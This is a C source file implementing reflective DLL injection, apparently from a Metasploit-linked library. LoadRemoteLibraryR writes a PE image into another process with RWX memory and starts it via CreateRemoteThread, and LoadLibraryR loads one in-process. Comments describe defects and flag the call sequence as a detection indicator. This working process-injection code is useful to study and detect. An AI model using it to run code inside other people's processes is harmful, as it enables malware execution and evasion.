//===============================================================================================//
// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
//       defined in order to use the correct RDI prototypes.
// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
//       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
// Note: This function currently can't inject across architectures, but only to architectures which are the
//       same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
//
// Parameters:
//   hProcess    - handle to the host process (access rights listed above); NULL is rejected
//   lpBuffer    - the raw PE image in this process's memory; NULL is rejected
//   dwLength    - size of the image in bytes; exactly this many bytes are reserved/committed in the host; 0 is rejected
//   lpParameter - handed unchanged to CreateRemoteThread as the new thread's parameter
// Returns: the handle of the remote thread that runs ReflectiveLoader, or NULL on any failure, including any
//   exception caught by the __except block below (the handler does not report what failed). The returned
//   handle is owned by the caller.
// Review note (defects, left as-is here): if WriteProcessMemory or CreateRemoteThread fails after the
//   VirtualAllocEx succeeded, the remote region is never released (no VirtualFreeEx), and the region is
//   PAGE_EXECUTE_READWRITE for its whole lifetime. bSuccess is assigned once and never read.
// Detection note: VirtualAllocEx(PAGE_EXECUTE_READWRITE) followed by WriteProcessMemory and CreateRemoteThread
//   against another process is the textbook remote-injection sequence and is a high-signal indicator for
//   endpoint telemetry; this function performs exactly that sequence.
HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
{
	BOOL bSuccess                             = FALSE; // unused
	LPVOID lpRemoteLibraryBuffer              = NULL;  // base of the image copy inside hProcess
	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;  // remote address of ReflectiveLoader
	HANDLE hThread                            = NULL;  // result; stays NULL on every failure path
	DWORD dwReflectiveLoaderOffset            = 0;     // file offset of ReflectiveLoader within lpBuffer
	DWORD dwThreadId                          = 0;     // filled by CreateRemoteThread, otherwise unused

	__try
	{
		// do/while(0) gives the early-exit breaks a single fall-through point
		do
		{
			if( !hProcess || !lpBuffer || !dwLength )
				break;

			// check if the library has a ReflectiveLoader...
			// GetReflectiveLoaderOffset is defined elsewhere in this project; 0 means "no exported loader"
			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
			if( !dwReflectiveLoaderOffset )
				break;

			// alloc memory (RWX) in the host process for the image...
			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
			if( !lpRemoteLibraryBuffer )
				break;

			// write the image into the host process...
			// NOTE: breaking out here leaks lpRemoteLibraryBuffer in the host (see review note above)
			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
				break;

			// add the offset to ReflectiveLoader() to the remote library address...
			// the file offset is reused as a memory offset because the whole file image was copied verbatim
			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );

			// create a remote thread in the host process to call the ReflectiveLoader!
			// 1024*1024 is the requested stack size; (DWORD)NULL is the creation-flags argument (0, run immediately)
			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );

		} while( 0 );

	}
	__except( EXCEPTION_EXECUTE_HANDLER )
	{
		// any SEH exception (e.g. an access violation while reading lpBuffer) is swallowed and reported as NULL
		hThread = NULL;
	}

	return hThread;
}
//===============================================================================================//
// Loads a DLL image from memory via its exported ReflectiveLoader function
//
// Parameters:
//   lpBuffer - the raw DLL image, already present in this process's memory; NULL is rejected
//   dwLength - size of the image in bytes; 0 is rejected
// Returns: the HMODULE the loaded library reports through DllMain(DLL_QUERY_HMODULE), or NULL if the image has
//   no ReflectiveLoader export, VirtualProtect fails, the loader returns NULL, DllMain returns FALSE, or an
//   exception is raised anywhere inside the __try block (swallowed by the __except below).
// Review note: the call that would restore the original page protection is commented out, so lpBuffer remains
//   PAGE_EXECUTE_READWRITE after this function returns, and dwOldProtect2 is consequently never used.
//   VirtualProtect is applied to [lpBuffer, lpBuffer + dwLength) exactly as given; the caller is responsible for
//   the region-alignment assumption stated in the inline comment below.
HMODULE WINAPI LoadLibraryR(LPVOID lpBuffer, DWORD dwLength)
{
	HMODULE hResult                    = NULL; // result; stays NULL on every failure path
	DWORD dwReflectiveLoaderOffset     = 0;    // file offset of ReflectiveLoader within lpBuffer
	DWORD dwOldProtect1                = 0;    // protection in effect before the RWX change
	DWORD dwOldProtect2                = 0;    // only needed by the (commented-out) restore call
	REFLECTIVELOADER pReflectiveLoader = NULL; // REFLECTIVELOADER / DLLMAIN are project-declared function pointer types
	DLLMAIN pDllMain                   = NULL;

	if (lpBuffer == NULL || dwLength == 0)
		return NULL;

	__try
	{
		// check if the library has a ReflectiveLoader...
		// GetReflectiveLoaderOffset is defined elsewhere in this project; 0 means "no exported loader"
		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpBuffer);
		if (dwReflectiveLoaderOffset != 0)
		{
			// the file offset doubles as a memory offset because lpBuffer holds the unmodified file image
			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);

			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
			if (VirtualProtect(lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1))
			{
				// call the library's ReflectiveLoader...
				// the loader returns the loaded image's DllMain (or NULL on failure), per the RDI prototype
				pDllMain = (DLLMAIN)pReflectiveLoader();
				if (pDllMain != NULL)
				{
					// call the loaded library's DllMain to get its HMODULE
					// Don't call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH as that is for payloads only.
					// DLL_QUERY_HMODULE is a project-defined reason code; DllMain writes the HMODULE through lpReserved
					if (!pDllMain(NULL, DLL_QUERY_HMODULE, &hResult))
						hResult = NULL;
				}
				// revert to the previous protection flags...
				// (disabled: the buffer therefore stays RWX after return, see review note above)
				//VirtualProtect(lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2);
			}
		}
	}
	__except (EXCEPTION_EXECUTE_HANDLER)
	{
		// any SEH exception from the loader or DllMain is swallowed and reported as NULL
		hResult = NULL;
	}

	return hResult;
}